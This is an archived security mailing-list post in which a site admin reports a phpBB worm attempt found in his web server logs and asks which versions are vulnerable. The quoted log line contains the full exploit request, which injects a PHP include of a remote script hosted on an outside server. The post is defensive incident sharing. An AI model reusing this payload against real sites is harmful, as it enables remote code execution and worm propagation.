New (maybe old?) PhpBB worm about?

Robin <[email protected]>
Newsgroups gmane.comp.security.incidents
Message-ID <[email protected]>
I just noticed these in my logs:
63.193.240.128 - - [11/Dec/2005:01:43:25 +1300] 
"GET /pbem/viewtopic.php?t=37&highlight=%2527.$poster=include($_GET[m]).
%2527&m=http://www.yatas.com/phpbb_private.txt?& HTTP/1.0" 403 1094 
"http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t fuck Aleks)"

this is pointing to a phpBB install that I chmod'ed away just recently (it 
was unused and attracting spam), hence the 403. A quick google for the UA 
string doesn't show up anything, however the URL that it links to seems 
to contain a PHP script that at a quick glance uses Google and Lycos to 
find more phpBB sites and spread to them. (If the yatas.com link is gone, 
and anyone wants a copy of the file, mail me offlist)

I'm also curious to know what the versions vulnerable to this exploit are.

-- 
Robin <[email protected]> JabberID: <[email protected]>

Hostes alienigeni me abduxerunt. Qui annus est?

PGP Key 0xA99CEB6D = 5957 6D23 8B16 EFAB FEF8  7175 14D3 6485 A99C EB6D
signature.asc (application/pgp-signature, 189 B)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFDmtQEFNNkhamc620RAkvdAJ9/MDG6Xr59wBnnkXdDWlQsdY/3GQCfRg05
9jdy6RLuJc3uNACwkct3Srk=
=zqKA
-----END PGP SIGNATURE-----
lmpx.com only provides a reader for public news (NNTP) servers. It is not affiliated with the servers or forums shown here and is not responsible for the content of articles, which is written by their respective authors.